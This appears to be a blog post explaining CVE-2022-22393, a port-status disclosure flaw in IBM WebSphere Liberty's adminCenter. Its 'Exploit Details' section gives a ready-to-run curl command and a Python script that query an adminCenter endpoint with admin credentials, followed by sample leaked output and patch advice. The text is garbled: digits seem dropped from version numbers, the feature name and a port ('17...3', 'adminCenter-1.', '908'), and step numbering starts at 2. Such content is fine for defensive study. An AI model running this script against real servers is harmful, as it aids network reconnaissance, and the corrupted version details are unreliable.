CVE-2022-22393 - How a Subtle Flaw in IBM WebSphere Liberty Could Leak Port Status to Authenticated Admins

In the fast-moving world of enterprise application servers, IBM WebSphere Application Server (WAS) Liberty is known for its lightweight, modular design. But even such robust platforms can stumble. One such example is CVE-2022-22393—a security weakness affecting Liberty editions from version 17...3 up to 22...5, specifically when the adminCenter-1. feature is enabled. This post takes a deep dive into what this vulnerability means, how it can be exploited, shows a code snippet demonstrating the weakness, and offers links to crucial references.

What is CVE-2022-22393?

CVE-2022-22393 is an information disclosure vulnerability. It allows an authenticated user (not a remote unauthenticated attacker out-of-the-box) to find out which HTTP and HTTPS ports the Liberty server is listening to. This is done by abusing a function in the adminCenter—Liberty’s shiny management dashboard.

IBM X-Force ID: 222078  
Affected Versions: 17...3 to 22...5 with adminCenter-1. feature turned on.

CVE page:  
- NVD - CVE-2022-22393

Why Does It Matter?

At first glance, "port status" may not sound so risky. But revealing which ports are active is valuable info to an attacker. It gives clues for follow-up attacks—like which management endpoints, debugging consoles, or custom business apps are live.

While it is only accessible to authenticated users, this is still a concern, especially in environments where adminCenter access is loosely managed.

The Root Of The Problem: adminCenter-1.

The adminCenter-1. feature enables a nice web UI for admins to handle their Liberty server. Behind the scenes, this dashboard interacts with back-end REST-like endpoints to show server status—including network port info.

The bug: A specific adminCenter API endpoint did not properly restrict information about current HTTP and HTTPS ports. An authenticated user could simply hit that endpoint, bypassing the usual UI constraints, and see sensitive networking status.

Exploit Details

Let's see how someone might use this vulnerability, step by step.

2. Finding the Endpoint

After logging in, the attacker can open a browser’s developer tools or use a tool like curl to send a crafted request straight to the adminCenter’s back-end REST endpoint—typically something like:

https://your-liberty-server:9443/adminCenter/api/servers/localhost/ports

Here’s a direct curl command exploiting the bug

curl -k -u admin:password \
  "https://<your_liberty_server>:9443/adminCenter/api/servers/localhost/ports";

Replace admin and password with valid Liberty credentials, and <your_liberty_server> with the server's hostname or IP.

If vulnerable, you’ll get back JSON output showing port configurations

{
  "http": [
    {"name": "defaultHttpEndpoint", "port": 908},
    {"name": "adminHttpEndpoint", "port": 9443}
  ],
  "https": [
    {"name": "defaultHttpsEndpoint", "port": 9443}
  ]
}

This dumps sensitive port mapping info! An attacker could now stage brute-force logins (if additional services are exposed), check for misconfigurations, or escalate within the network.

Below is a Python demo using requests to automate the attack

import requests
from requests.auth import HTTPBasicAuth

url = 'https://your-liberty-server:9443/adminCenter/api/servers/localhost/ports'
username = 'admin'  # Replace with actual user
password = 'password'  # Replace with actual password

response = requests.get(url, auth=HTTPBasicAuth(username, password), verify=False)
if response.status_code == 200:
    print("Port info leaked!")
    print(response.json())
else:
    print("No data, or not vulnerable?")

Official Patch and Workaround

IBM quickly patched the adminCenter code to ensure only users with proper privilege can access these endpoints.

Also, *disable* the adminCenter-1. feature if you don't need the web UI management tools

<!-- In server.xml, remove or comment out: -->
<feature>adminCenter-1.</feature>

Resources and References

- IBM Security Bulletin: CVE-2022-22393
- NVD CVE-2022-22393
- IBM WebSphere Liberty Documentation

Conclusion

CVE-2022-22393 highlights how even small leaks inside trusted web admin panels can have network security consequences. Always keep up on vendor patches, limit admin access, and regularly audit server features—especially powerful ones like adminCenter-1..

If you’re running a vulnerable version, update ASAP. If you don’t use adminCenter, turn it off. Stay safe out there!

Timeline

Published on: 05/13/2022 17:15:00 UTC
Last modified on: 05/23/2022 19:08:00 UTC